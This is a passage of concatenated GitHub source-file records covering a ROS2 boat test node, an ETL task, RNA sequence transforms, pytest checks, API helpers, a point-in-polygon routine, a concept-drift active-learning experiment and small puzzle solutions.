self.declare_parameter('surge_speed', 20)\n self.surge_speed = self.get_parameter('surge_speed').get_parameter_value().integer_value\n\n self.declare_parameter('turns', [90])\n self.turns = self.get_parameter('turns').get_parameter_value().integer_array_value \n\n self.check = self.create_timer(0.5, self.check_timer) \n\n self.heading = 0\n self.datum = None\n self.turning = False\n self.executed = 0\n self.effort = 0\n\n # Start by surging\n self.surge()\n\n\n def surge(self):\n self.get_logger().info('Surge')\n\n surge = Int8()\n surge.data = self.surge_speed\n self.surge_pub.publish(surge)\n\n self.surge_timer = self.create_timer(self.surge_time, self.surge_timer_cb)\n\n def surge_timer_cb(self):\n self.get_logger().info('Stop')\n \n self.destroy_timer(self.surge_timer)\n\n if self.executed < len(self.turns):\n self.turn()\n else:\n self.get_logger().info('Finished')\n\n stop = Int8()\n stop.data = 0\n self.surge_pub.publish(stop)\n\n\n def turn(self):\n self.get_logger().info('Turning')\n\n self.heading += self.turns[self.executed] \n # Convert t0 +/- 180 - might break if given > 360 rotation, don't do that\n if self.heading > 180:\n self.heading -= 360\n elif self.heading < -180:\n self.heading += 360\n\n cmd = Int16()\n cmd.data = self.heading\n self.yaw_pub.publish(cmd)\n\n self.turning = True \n self.executed += 1\n\n\n def yaw_cb(self, msg):\n self.effort = msg.data\n \n \n def check_timer(self):\n if self.turning:\n if abs(self.effort) <= 1:\n self.turning = False\n self.surge()\n\n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n square_test = SquareTest()\n rclpy.spin(square_test)\n\n square_test.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()","repo_name":"robbal46/usv_fyp","sub_path":"usv_test/usv_test/square_test.py","file_name":"square_test.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72664346328","text":"import luigi\nimport json\nfrom extractTask import ExtractTask\n\nclass TransformTask(luigi.Task):\n version = luigi.IntParameter(default=1)\n\n def requires(self):\n return ExtractTask(version=self.version)\n\n def run(self):\n\n # Load the extracted data\n with self.input().open('r') as input_file:\n extracted_data = json.load(input_file)\n\n # Directly pass on the data that doesn't need to be transformed\n userDim = extracted_data[\"employee\"]\n bookDim = extracted_data[\"book\"]\n keywordDim = extracted_data[\"keyword\"]\n bookKeywordFact = extracted_data[\"keyword_books\"]\n reviewFact = extracted_data[\"review\"]\n \n # Define variables for data that needs to be transformed\n loans = extracted_data[\"loan\"]\n copies = extracted_data[\"copy\"]\n\n # Helper variable for the mapping from copy to book to eliminate copies in the target db\n copy_to_book = {}\n for loan in loans:\n copy_id = loan[3]\n for copy in copies:\n if(copy_id == copy[0]):\n book_id = copy[1]\n copy_to_book[copy_id] = book_id\n\n # Create loanFact by combining loan and book information\n loanFact = []\n for loan in loans:\n\n loan_fact_entry = {\n 'loan_id': loan[0],\n 'loan_date': loan[1],\n 'return_date': loan[2],\n 'book_id': copy_to_book[loan[3]],\n 'employee_id': loan[4]\n }\n loanFact.append(loan_fact_entry)\n\n # Store transformed data in a dictionary\n transformed_data = {\n 'User_DIM': userDim,\n 'Book_DIM': bookDim,\n 'Keyword_DIM': keywordDim,\n 'Book_Keyword_FACT': bookKeywordFact,\n 'Review_FACT' : reviewFact,\n 'Loan_FACT': loanFact\n }\n\n # Save the extracted data as a JSON file\n with self.output().open('w') as output_file:\n json.dump(transformed_data, output_file)\n\n def output(self):\n filename = f'transformed_data_v{self.version}.json'\n return luigi.LocalTarget(filename)","repo_name":"szasadny/Luigi-ETL-Pipeline","sub_path":"transformTask.py","file_name":"transformTask.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28584903607","text":"# encoding: utf-8\n\"\"\"\n@author: chenjiayang\n@contact: chenjiayang@163.com\n\"\"\"\n\nimport sys\nimport collections\nimport random\nimport torch\nimport numpy as np\n\n\nif sys.version_info < (3, 3):\n Sequence = collections.Sequence\n Iterable = collections.Iterable\nelse:\n Sequence = collections.abc.Sequence\n Iterable = collections.abc.Iterable\n\n\nclass Compose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0]\n if the PIL Image belongs to one of the modes (L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK, 1)\n or if the numpy.ndarray has dtype = np.uint8\n\n In the other cases, tensors are returned without scaling.\n \"\"\"\n\n def __call__(self, sequence):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return torch.Tensor(sequence)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Encode(object):\n \"\"\"\n \"DNA Sequence Classification by Convolutional Neural Network\"\n Article in Journal of Biomedical Science and Engineering · January 2016\n DOI: 10.4236/jbise.2016.95021\n \"\"\"\n def __init__(self):\n self.element_vector_length = 4 # one-hot A U G C\n self.word_length = 3 # n elements -> a word\n self.region_size = 4 # n word -> a column\n\n # map word into a scalar\n temp1 = np.array(range(self.element_vector_length)).reshape((self.element_vector_length,1))\n temp2 = np.array([np.power(self.element_vector_length, i) for i in range(self.word_length)]).reshape((1, self.word_length))\n\n self.word_encode_table = np.dot(temp1, temp2)\n\n self.vector_encode_table = np.eye(64)\n\n def __call__(self, sequence):\n ori_word_list = []\n # print(sequence.shape)\n num_word = sequence.shape[-1] // self.word_length\n # print(\"num_words:{}\".format(num_word))\n for i in range(num_word):\n word_start = i * self.word_length\n word_end = word_start + self.word_length\n word = sequence[:, word_start:word_end]\n scalar = (self.word_encode_table * word).sum() # (word_length * word_vector) X (word_vector * sequence_length)\n vector = self.vector_encode_table[scalar]\n ori_word_list.append(vector)\n\n new_word_list = []\n for j in range(self.region_size):\n new_word_list.append(np.array(ori_word_list[j:len(ori_word_list) - self.region_size + 1 + j]).T)\n sequence = np.concatenate(new_word_list, axis=0)\n # print(sequence.shape)\n sequence = np.expand_dims(sequence,0) # the channel of 'image'\n\n return sequence\n\n\nclass RandomCrop(object):\n \"\"\"\n input: numpy\n \"\"\"\n def __init__(self, crop_length):\n self.crop_length = crop_length #2000 # 777 ——> encode 256*256\n\n def __call__(self, sequence):\n length = sequence.shape[-1]\n if self.crop_length > 0:\n if self.crop_length < length:\n start = random.randint(0, length - self.crop_length)\n elif self.crop_length == length:\n start = 0\n else:\n raise Exception(\"Crop Length is greater than Sequence Length!\")\n\n sequence = sequence[:, start:start + self.crop_length]\n\n return sequence\n\n\nclass ClampLength(object):\n \"\"\"\n input: numpy V * L\n \"\"\"\n def __init__(self, min=0, max=-1):\n self.min = abs(min) # abs for ensemble prediction\n self.max = abs(max)\n if self.max < self.min and self.min > 0 and self.max > 0:\n raise Exception(\"Set Max less than Min! for Length\")\n\n def __call__(self, sequence):\n length = sequence.shape[-1]\n if self.min > length:\n diff = self.min - length\n sequence = np.pad(sequence, ((0,0), (0, diff)), \"constant\")\n elif self.max < length:\n start = random.randint(0, length - self.max)\n sequence = sequence[:, start:start + self.max]\n else:\n pass\n return sequence\n","repo_name":"ml4bio/RNA-FM","sub_path":"redevelop/data/transforms/cla_transforms.py","file_name":"cla_transforms.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"31"} +{"seq_id":"34340500407","text":"#!/usr/bin/env python3\n\nfrom hashlib import sha256\n\nimport pytest\n\n\n@pytest.mark.ranges([\n (1, 2),\n (2, 10)\n])\n@pytest.mark.message('block duplicates found: [2]')\ndef test_dup_block_check_simple(init_db_and_run_translator):\n ...\n\n\n@pytest.mark.ranges([\n (1, 200),\n (150, 300)\n])\n@pytest.mark.message('tx duplicates found: {str([i for range(150, 201, 1)])}')\ndef test_dup_block_check_multi(init_db_and_run_translator):\n ...\n\n\n\ntest_hash = sha256(b'test_tx').hexdigest()\n@pytest.mark.ranges([\n (110, 120),\n])\n@pytest.mark.txs([\n {'@raw.block': 110, '@raw.hash': test_hash},\n {'@raw.block': 115, '@raw.hash': test_hash}\n])\n@pytest.mark.message(f'tx duplicates found: [\\\"{test_hash}\\\"]')\ndef test_dup_tx_check(init_db_and_run_translator):\n ...\n","repo_name":"telosnetwork/telosevm-translator","sub_path":"tests/test_dup_check.py","file_name":"test_dup_check.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26297889990","text":"# Import libraries\nimport requests\nimport json\n\nclass WebScraping:\n\tdef __init__(self, settings):\n\t\tself.settings = settings\n\t\tself.api_keys = json.load(open(\"api_keys.json\"))\n\n\n\t# Gets the forecast from the OpenWeatherMap API\n\tdef weather_map_api(self, lonlat):\n\t\tweather_map_api_key = self.api_keys[\"OpenWeatherMap\"]\n\t\t\n\t\tforecast = requests.get(\"https://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&appid={}&units={}\".format(\n\t\t\tlonlat[1],\n\t\t\tlonlat[0],\n\t\t\tweather_map_api_key,\n\t\t\tself.settings[\"measuring_system\"]\n\t\t)).json()\n\n\t\tinfo = \"{} degrees and {}\".format(\n\t\t\tround(forecast[\"main\"][\"temp\"]), forecast[\"weather\"][0][\"description\"])\n\t\treturn info\n\n\n\tdef currency_rates_api(self):\n\t\tcurrency_rates_api_key = self.api_keys[\"ExchangeRateAPI\"]\n\n\t\tcurrency_rates = requests.get(\"http://api.exchangeratesapi.io/v1/latest?access_key={}\".format(\n\t\t\tcurrency_rates_api_key\n\t\t)).json()\n\n\t\treturn currency_rates\n","repo_name":"SuchLuukie/virtual-assistant","sub_path":"server/commands/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6704322644","text":"import configparser\nimport os\n\nfrom pymongo import MongoClient\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini') \n\nmyclient=MongoClient(config['DATABASE']['DATABASE_URI'],\n int(config['DATABASE']['PORT']))\n \ndatabase = myclient[config['DATABASE']['DATABASE_NAME']]\ntoken_revoke_db = database[config['DATABASE']['TABLE_TOKEN']] \n \n \nclass TokenRevoke(object):\n token_revoke = token_revoke_db\n\n def __init__(self, token): \n self.token = token \n\n def add(self):\n token={\"jti\":self.token}\n token_id=self.token_revoke.insert_one(token).inserted_id\n return token_id \n\n @classmethod\n def get(cls,token):\n return cls.token_revoke.find_one({'jti':token})\n\n @classmethod\n def is_jti_blacklisted(cls, jti):\n query = cls.token_revoke.find_one({\"jti\": jti})\n return bool(query) \n","repo_name":"KornkamonS/python_api","sub_path":"Flask_restful/models/TokenRevoke.py","file_name":"TokenRevoke.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22781147906","text":"\"\"\"Simple method to detect points on the interior or exterior of a closed \npolygon. Returns a boolean for single points, or an array of booleans for a \nline masking the segment(s) of the line within the polygon.\n\nFor each point, operates via a ray-casting approach -- the function projects \na semi-infinite ray parallel to the positive horizontal axis, and counts how \nmany edges of the polygon this ray intersects. For a simply-connected \npolygon, this determines whether the point is inside (even number of crossings) \nor outside (odd number of crossings) the polygon, by the Jordan Curve Theorem.\n\"\"\"\nimport numpy as np\n\ndef contains(polyx,polyy,linex,liney):\n \"\"\"Calculate whether given points are within a 2D simply-connected polygon.\n Returns a boolean \n\n ARGS:\n polyx: array-like.\n Array of x-coordinates of the vertices of a polygon.\n polyy: array-like.\n Array of y-coordinates of the vertices of a polygon. Must match \n dimension of polyx.\n linex: array-like or float.\n x-coordinate(s) of test point(s).\n liney: array-like or float.\n y-coordiante(s) of test point(s). Must match dimension of linex.\n\n RETURNS:\n mask: boolean or array of booleans.\n For each (linex,liney) point, True if point is in the polygon, \n else False.\n \"\"\"\n # check type, dimensions of polyx,polyy\n try:\n # check that polyx, polyy are iterable\n iter(polyx)\n iter(polyy)\n except TypeError:\n raise TypeError(\"polyx, polyy must be iterable\")\n if len != len(polyy):\n raise ValueError(\"polyx, poly must be of same size\")\n if len(polyx) < 3:\n raise ValueError(\"polygon must consist of at least three points\")\n\n # handler for single-value vs. array versions for linex, liney\n single_val = True\n try:\n iter(linex)\n except TypeError:\n linex = np.asarray([linex],dtype=float)\n else:\n linex = np.asarray(linex,dtype=float)\n single_val = False\n\n try:\n iter(liney)\n except TypeError:\n liney = np.asarray([liney],dtype=float)\n else:\n liney = np.asarray(liney,dtype=float)\n single_val = False\n\n if linex.shape != liney.shape:\n raise ValueError(\"linex, liney must be of same shape\")\n \n # generator for points in polygon\n def lines():\n p0x = polyx[-1]\n p0y = polyy[-1]\n p0 = (p0x,p0y)\n for i,x in enumerate(polyx):\n y = polyy[i]\n p1 = (x,y)\n yield p0,p1\n p0 = p1\n\n mask = np.array([False for i in range(len(linex))])\n for i,x in enumerate(linex):\n y = liney[i]\n result = False\n\n for p0,p1 in lines():\n if ((p0[1] > y) != (p1[1] > y)) and (x < ((p1[0]-p0[0])*(y-p0[1])/(p1[1]-p0[1]) + p0[0])):\n result = not result \n mask[i] = result\n\n # recast mask -- single Boolean if single_val inputs, else return array of booleans\n if single_val:\n mask = mask[0]\n\n return mask\n","repo_name":"jrwalk/inPolygon","sub_path":"inPolygon.py","file_name":"inPolygon.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30505999471","text":"#\n# @lc app=leetcode id=39 lang=python3\n#\n# [39] Combination Sum\n#\n\n# @lc code=start\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n ans = []\n start = 0\n candidates.sort()\n\n def dfs(candidates, target, cur, ans, start):\n if target == 0:\n ans.append(cur)\n return\n\n for i in range(start, len(candidates)):\n if candidates[i] > target:\n break\n dfs(candidates, target -\n candidates[i], cur+[candidates[i]], ans, i)\n\n dfs(candidates, target, [], ans, start)\n return ans\n# @lc code=end\n","repo_name":"naseeihity/leetcode-daily","sub_path":"search/39.combination-sum.py","file_name":"39.combination-sum.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74487458649","text":"import warnings\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nfrom collections import deque\n\nfrom scipy.ndimage import gaussian_filter1d\nfrom skactiveml.utils import call_func\nfrom skactiveml.classifier import PWC\nfrom skactiveml.stream import FixedUncertainty, VariableUncertainty, Split, PALS, RandomSampler, PeriodicSampler\nfrom skactiveml.stream.budget_manager import FixedThresholdBudget, FixedUncertaintyBudget, BIQF, \\\n VariableUncertaintyBudget, SplitBudget, EstimatedBudget\nfrom skactiveml.stream.verification_latency import BaggingDelaySimulationWrapper, ForgettingWrapper, \\\n FuzzyDelaySimulationWrapper\nfrom skactiveml.classifier import SklearnClassifier\n\nfrom skmultiflow.drift_detection import PageHinkley, KSWIN, EDDM, DDM, HDDM_W, HDDM_A\nfrom skmultiflow.drift_detection.adwin import ADWIN\n\nfrom sklearn.datasets import make_blobs, make_classification\nfrom sklearn.svm import SVC\n\nfrom skmultiflow.trees import HoeffdingTreeClassifier\nfrom skmultiflow.lazy import KNNClassifier\n\nfrom src.concept_drift.skflow_detectors import HDDDM\n\nwarnings.filterwarnings(\"ignore\")\nplt.switch_backend('Qt5Agg')\n\n\ndef get_randomseed(random_state):\n return random_state.randint(2 ** 31 - 1)\n\n\ndef linear_interp(a, b, alpha):\n return a * alpha + (1 - alpha) * b\n\n\n######################################################################################################\nif __name__ == '__main__':\n np.random.seed(0)\n # random state that is used to generate random seeds\n random_state = np.random.RandomState(0)\n # number of instances that are provided to the classifier\n init_train_length = 100\n # the length of the data stream\n stream_length = 1000\n # the size of the sliding window that limits the training data\n training_size = 500\n # the verification latency occuring after querying a label\n verification_latency = 100\n budget = 0.1\n\n # Parameters for delay wrapper\n K = 2\n w_train = training_size\n delay_prior = 0.001\n\n # create the data stream\n # X, center = make_blobs(n_samples=init_train_length + stream_length, centers=30,\n # random_state=get_randomseed(random_state), shuffle=True)\n # y = center % 2\n\n # X, y = make_classification(n_samples=init_train_length + stream_length, n_features=2, n_informative=2,\n # n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=2, class_sep=1.0,\n # random_state=get_randomseed(random_state), shuffle=True)\n\n # Drifting Dataset\n X, y, centers = make_blobs(n_samples=1000 + init_train_length, n_features=2, centers=[(-3, 3), (3, 3)], cluster_std=1.,\n return_centers=True)\n x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=2, centers=centers + 25,\n cluster_std=1.0, return_centers=True)\n X = np.vstack([X, x_test_])\n y = np.hstack([y, Y_test_])\n x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=2, centers=centers - 25,\n cluster_std=1.0, return_centers=True)\n # Gradual drift\n # for i in [x * 0.1 for x in range(1, 10, 1)]:\n # x_, y_ = make_blobs(n_samples=300, n_features=2,\n # centers=linear_interp(centers_end, centers, i),\n # cluster_std=1.0)\n # X = np.vstack([X, x_])\n # y = np.hstack([y, y_])\n # X = np.vstack([X, x_test_])\n # y = np.hstack([y, Y_test_])\n stream_length = len(X)\n\n X_init = X[:init_train_length, :]\n y_init = y[:init_train_length]\n X_stream = X[init_train_length:, :]\n y_stream = y[init_train_length:]\n # create the time stamps\n # sample arrival\n tX = np.arange(stream_length)\n # label arrival\n ty = tX + verification_latency\n tX_init = tX[:init_train_length]\n ty_init = ty[:init_train_length]\n tX_stream = tX[init_train_length:]\n ty_stream = ty[init_train_length:]\n\n ######################################################################################################\n drift_factory = {\n 'None': lambda qs: qs,\n 'DDM': lambda: DDM(min_num_instances=30 + verification_latency, warning_level=2.0, out_control_level=3.0),\n 'ADWIN': lambda: ADWIN(delta=2.),\n 'EDDM': lambda: EDDM(),\n 'PH': lambda: PageHinkley(min_instances=30 + verification_latency, delta=0.005, threshold=3, alpha=1 - 0.0001),\n 'HDDDM': lambda: HDDDM(window_size=training_size, min_samples=training_size // 2, warning_gamma=1.,\n change_gamma=2., dimension=X.shape[1])\n }\n\n ######################################################################################################\n # clf_factory = lambda: PWC(classes=[0, 1], random_state=get_randomseed(random_state))\n # clf_factory = lambda: SklearnClassifier(SVC(probability=True), classes=[0, 1], random_state=get_randomseed(random_state))\n clf_factory = lambda: SklearnClassifier(HoeffdingTreeClassifier(), classes=[0, 1], random_state=get_randomseed(random_state))\n # clf_factory = lambda : SklearnClassifier(KNNClassifier(n_neighbors=5, max_window_size=training_size), classes=[0, 1], random_state=get_randomseed(random_state))\n\n missing_label = clf_factory().missing_label\n query_strategies_factories = {\n 'RandomSampler': lambda: RandomSampler(random_state=get_randomseed(random_state),\n budget_manager=FixedThresholdBudget(budget=budget)),\n # 'PeriodicSampler': lambda: PeriodicSampler(random_state=get_randomseed(random_state),\n # budget_manager=FixedThresholdBudget(budget=budget)),\n # 'FixedUncertainty': lambda: FixedUncertainty(random_state=get_randomseed(random_state),\n # budget_manager=FixedUncertaintyBudget(budget=budget)),\n #'VariableUncertainty': lambda: VariableUncertainty(random_state=get_randomseed(random_state),\n # budget_manager=VariableUncertaintyBudget(budget=budget)),\n 'Split': lambda: Split(random_state=get_randomseed(random_state), budget_manager=SplitBudget(budget=budget)),\n 'PALS': lambda: PALS(random_state=get_randomseed(random_state), budget_manager=BIQF(budget=budget))\n }\n\n for query_strategy_name, query_strategy_factory in query_strategies_factories.items():\n delay_wrappers_factories = {\n 'None': lambda qs: qs,\n #'Forgetting': lambda qs: ForgettingWrapper(base_query_strategy=qs, w_train=w_train,\n # random_state=get_randomseed(random_state)),\n # 'BaggingDelaySimulation': lambda qs: BaggingDelaySimulationWrapper(base_query_strategy=qs,\n # random_state=get_randomseed(\n # random_state), K=K,\n # delay_prior=delay_prior),\n # 'FuzzyDelaySimulation': lambda qs: FuzzyDelaySimulationWrapper(base_query_strategy=qs,\n # random_state=get_randomseed(random_state),\n # delay_prior=delay_prior)\n }\n # delay_wrappers_factories[\"Forgetting + Bagging\"] = lambda qs: delay_wrappers_factories[\"Forgetting\"](\n # BaggingDelaySimulationWrapper(base_query_strategy=qs,\n # random_state=get_randomseed(\n # random_state), K=K,\n # delay_prior=delay_prior))\n # delay_wrappers_factories[\"Forgetting + Fuzzy\"] = lambda qs: delay_wrappers_factories[\"Forgetting\"](\n # delay_wrappers_factories[\"FuzzyDelaySimulation\"](qs))\n print(\"Query Strategy: \", query_strategy_name, )\n plt.figure()\n for delay_wrapper_name, delay_wrapper_factory in delay_wrappers_factories.items():\n u_drift = drift_factory['HDDDM']()\n s_drift = drift_factory['PH']()\n clf = clf_factory()\n # initializing the query strategy\n delay_wrapper = delay_wrapper_factory(query_strategy_factory())\n # initializing the training data\n X_train = deque(maxlen=training_size)\n X_train.extend(X_init)\n y_train = deque(maxlen=training_size)\n y_train.extend(y_init)\n # initialize the time stamps corresponding to the training data\n tX_train = deque(maxlen=training_size)\n tX_train.extend(tX_init)\n ty_train = deque(maxlen=training_size)\n ty_train.extend(ty_init)\n # initializing the acquisition vector\n acquisitions = deque(maxlen=training_size)\n acquisitions.extend(np.full(len(y_train), True))\n # train the model with the initially available data\n clf.fit(X_train, y_train)\n yhat = clf.predict(X_train)\n # initialize the list that stores the result of the classifier's prediction\n correct_classifications = [y_ == y for y_, y in zip(yhat, y_train)]\n init_acc = np.sum(correct_classifications) / len(yhat)\n print('Init class accuracy: {}'.format(init_acc))\n # # Initialized the drift detector\n err_sig = 1 - (np.asarray(correct_classifications).astype(int))\n for e in X_train:\n u_drift.add_element(e)\n for e in err_sig:\n s_drift.add_element(e)\n # initialize the number of acquired labels\n count = 0\n u_drift_idx = []\n s_drift_idx = []\n drift_flag = False\n # iterate over the whole data stream\n for t, (x_t, y_t, tX_t, ty_t) in enumerate(zip(X_stream, y_stream, tX_stream, ty_stream)):\n # infer the currently available labels\n # missing_label is used to denote unlabeled instances\n X_cand = x_t.reshape([1, -1])\n y_cand = y_t\n tX_cand = tX_t\n ty_cand = ty_t\n\n # manage delay in label. Do not forget. Do not add unavailable labels due delay.\n y_train_current = np.array(\n [y if ty < tX_cand and a else missing_label for ty, y, a in zip(ty_train, y_train, acquisitions)])\n # # Semi-supervised drift detection\n if len(y_train_current) > verification_latency:\n last_queried = y_train_current[-verification_latency - 1]\n if last_queried != np.nan:\n e = 1 - (np.asarray(correct_classifications)[-verification_latency - 1]).astype(int)\n s_drift.add_element(e)\n if s_drift.detected_change():\n s_drift_idx.append(t)\n drift_flag = True\n # true_acquisitions = [ty < tX_cand and a for ty, a in zip(ty_train, acquisitions)]\n # pending_acq = np.sum(np.asarray(true_acquisitions) == False)\n # n = len(acquisitions)\n # acquisitions.clear()\n # acquisitions.extend([False for _ in range(n)])\n # y_train_current = np.full(len(y_train_current), np.nan)\n else:\n drift_flag = False\n # Unsupervised drift\n u_drift.add_element(X_cand)\n if u_drift.detected_change():\n u_drift_idx.append(t)\n drift_flag = True\n else:\n drift_flag = False\n\n # evaluation strategy: test-than-train\n # evaluate the prediction of the classifier\n yhat = clf.predict(X_cand)[0]\n correct_classifications.append(yhat == y_cand)\n # train the classifier\n if np.sum(~np.isnan(y_train_current)) > 0:\n clf.fit(np.array(X_train), np.array(y_train_current))\n\n # check whether to sample the instance or not\n sampled_indices, utilities = call_func(delay_wrapper.query, X_cand=X_cand, clf=clf, X=np.array(X_train),\n y=np.array(y_train_current),\n tX=np.array(tX_train), ty=np.array(ty_train),\n tX_cand=[tX_cand],\n ty_cand=[ty_cand], return_utilities=True,\n acquisitions=acquisitions,\n drift=False)\n # create budget_manager_param_dict for BIQF used by PALS\n budget_manager_param_dict = {\"utilities\": utilities}\n delay_wrapper.update(X_cand, sampled_indices, budget_manager_param_dict)\n # set the entry within the acquisition vector according to the query strategy's decision\n acquisitions.append((len(sampled_indices) > 0))\n if len(sampled_indices):\n count += 1\n\n # add the current instance to the training data\n tX_train.append(tX_cand)\n ty_train.append(ty_cand)\n X_train.append(x_t)\n y_train.append(y_cand)\n # calculate and show the average accuracy\n print(\"Delay Wrapper: \", delay_wrapper_name, \", Avg Accuracy: \",\n np.sum(correct_classifications) / stream_length, \", Number of acquired instances: \", count)\n # smoothed_curve = gaussian_filter1d(np.array(correct_classifications, dtype=float), 20)\n # smoothed_curve = np.array(correct_classifications)\n # smoothing the accuracy for plotting\n smoothing_window_length = 100\n s_idx = np.asarray(s_drift_idx) # - smoothing_window_length + init_train_length + 1\n u_idx = np.asarray(u_drift_idx) # - smoothing_window_length + init_train_length + 1\n # cumsum_correct_classifications = np.cumsum(correct_classifications)\n # smoothed_curve = (cumsum_correct_classifications[smoothing_window_length:] -\n # cumsum_correct_classifications[:-smoothing_window_length]) / smoothing_window_length\n # smoothed_curve = np.asarray(correct_classifications)\n smoothed_curve = np.convolve(correct_classifications, np.ones(smoothing_window_length),\n mode='valid') / smoothing_window_length # len: max(M,N) - min(M,N) + 1\n plt.plot(smoothed_curve, label=delay_wrapper_name)\n try:\n plt.plot(s_idx, smoothed_curve[s_idx], 'x', c='red', alpha=1.0, label='Supervised Drift points')\n plt.plot(u_idx, smoothed_curve[u_idx], 'x', c='blue', alpha=1.0, label='Unsupervised Drift points')\n except:\n print(f'Drift not found')\n plt.title(f'{query_strategy_name}')\n if query_strategy_name == 'RandomSampler':\n break\n plt.legend()\n plt.show(block=True)\n","repo_name":"Castel44/AL_delay","sub_path":"src/active_learning_drift.py","file_name":"active_learning_drift.py","file_ext":"py","file_size_in_byte":15612,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"13389352018","text":"\n\npeso_peixe = float(input('Informe o peso do peixe: '))\n\npeso_excesso = peso_peixe - 50\n\nif peso_excesso > 0:\n multa = peso_excesso*4.00\n print('\\nO peixe está acima do {} quilos acima do limite. Você deverá pagar uma multa de R$ {} '.format(peso_excesso,multa))\nelse:\n print('O peso do peixe está dentro do limite')","repo_name":"Lucas-Davys/Exercicios-em-Python","sub_path":"Exercício 13.py","file_name":"Exercício 13.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38383551409","text":"from collections import defaultdict\nfrom typing import List, Set, Tuple\n\nfrom aocpuzzle import AoCPuzzle\n\n\nclass Puzzle07(AoCPuzzle):\n def common(self, input_data: List[str]) -> None:\n self.bags = defaultdict(list)\n self.inner_bags = defaultdict(list)\n\n for rule in input_data:\n outer_bag, inner_bags = rule.split(' bags contain ')\n\n if inner_bags == 'no other bags.':\n continue\n\n for inner_bag in inner_bags.split(', '):\n ob = tuple(outer_bag.split())\n ib = tuple(inner_bag.split()[:-1])\n\n self.bags[ob].append(ib)\n self.inner_bags[ib[1:3]].append(ob)\n\n def part1(self) -> int:\n bags: Set = set()\n\n q, visited = [('shiny', 'gold')], []\n\n while len(q) > 0:\n bag = q.pop(0)\n\n for inner_bag in self.inner_bags[bag]:\n if inner_bag not in visited:\n bags.add(inner_bag)\n q.append((inner_bag[0], inner_bag[1]))\n visited.append(bag)\n return len(bags)\n\n def count(self, color: Tuple[str, str]) -> int:\n bags_count = 0\n\n for bag in self.bags[color]:\n bags_count += int(bag[0]) + (self.count((bag[1], bag[2])) * int(bag[0]))\n\n return bags_count\n\n def part2(self) -> int:\n return self.count(('shiny', 'gold'))\n\n def test_cases(self, input_data: List[str]) -> int:\n part1_tests = [\n 'light red bags contain 1 bright white bag, 2 muted yellow bags.',\n 'dark orange bags contain 3 bright white bags, 4 muted yellow bags.',\n 'bright white bags contain 1 shiny gold bag.',\n 'muted yellow bags contain 2 shiny gold bags, 9 faded blue bags.',\n 'shiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.',\n 'dark olive bags contain 3 faded blue bags, 4 dotted black bags.',\n 'vibrant plum bags contain 5 faded blue bags, 6 dotted black bags.',\n 'faded blue bags contain no other bags.',\n 'dotted black bags contain no other bags.',\n ]\n part2_tests = [\n 'shiny gold bags contain 2 dark red bags.',\n 'dark red bags contain 2 dark orange bags.',\n 'dark orange bags contain 2 dark yellow bags.',\n 'dark yellow bags contain 2 dark green bags.',\n 'dark green bags contain 2 dark blue bags.',\n 'dark blue bags contain 2 dark violet bags.',\n 'dark violet bags contain no other bags.',\n ]\n\n self.common(part1_tests)\n assert self.part1() == 4\n\n self.common(input_data)\n assert self.part1() == 302\n\n self.common(part2_tests)\n assert self.part2() == 126\n\n self.common(input_data)\n assert self.part2() == 4165\n\n return 3\n","repo_name":"cpallapolu/advent-of-code","sub_path":"src/years/2020/07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14248094000","text":"import pytest\n\npytestmark = pytest.mark.asyncio\n\n\nclass TestWorkerConnectedAndHasWork:\n async def test(\n self, 